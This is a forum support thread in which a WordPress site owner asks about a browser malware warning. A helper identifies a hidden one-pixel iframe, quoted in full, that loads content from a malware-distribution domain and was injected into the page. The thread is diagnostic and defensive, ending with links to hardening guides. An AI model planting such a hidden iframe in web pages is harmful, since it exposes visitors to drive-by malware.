A virus warning to visitors

tom_m
(@tom_m)

14 years, 10 months ago

When viewing my website with Google Chrome, I get this little warning:

http://www.altoonafirefighters.org contains content from ntkrnlpa.info, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

You don’t get any other warnings when viewing the page with Firefox or IE. What does this warning mean? My WordPress site has only been active for like 2 weeks after a fresh instal with nothing else in my websites root folder.

Viewing 3 replies - 1 through 3 (of 3 total)

Clayton James
(@claytonjames)

14 years, 10 months ago

Hi, tom! I hate when these things happen. You seem to have a hidden link on your site that points to ntkrnlpa.info. Here is the Google security report on your site: http://www.google.com/safebrowsing/diagnostic?site=www.altoonafirefighters.org

..But a quick check reveals this lovely alphabet soup: http://www.google.com/#sclient=psy&hl=en&source=hp&q=ntkrnlpa.info&aq=0&aqi=g1&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=fce33a84b0764b22&biw=1680&bih=888

Looking at the source code for your 7/09 cached front page, I can see this just before your closing body tag:
<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>

Looks like you may be the victim of an intrusion of some sort.

[edit] When I expand the iframe using firebug in firefox so I can view the content, it does indeed appear to be the source of the issue. The AVG warning I got was:

Reported Attack Page!
This web page at ntkrnlpa.info has been reported as an attack page and has been blocked based on your security preferences. Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

Thread Starter tom_m
(@tom_m)

14 years, 10 months ago

Yep you’re right it is there. I just installed the WordPress site like 2 weeks ago. How the heck did that get added so quick. If WordPress is this vulnerable, than I’m not sure I want to keep it running.

I found the offending file and removed the bit of code. I hope that’s all I have to do to get rid of it. The error is gone in Google Chrome. What steps can I take to prevent that from happening again?

Clayton James
(@claytonjames)

14 years, 10 months ago

If WordPress is this vulnerable, than I’m not sure I want to keep it running.

It’s not. I personally, would be suspect of any other means of entry. Including but limited to, all of the usual suspects associated with any shared hosting services you may be using.

Some helpful reading:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

http://codex.wordpress.org/Hardening_WordPress

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘A virus warning to visitors’ is closed to new replies.

A virus warning to visitors

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics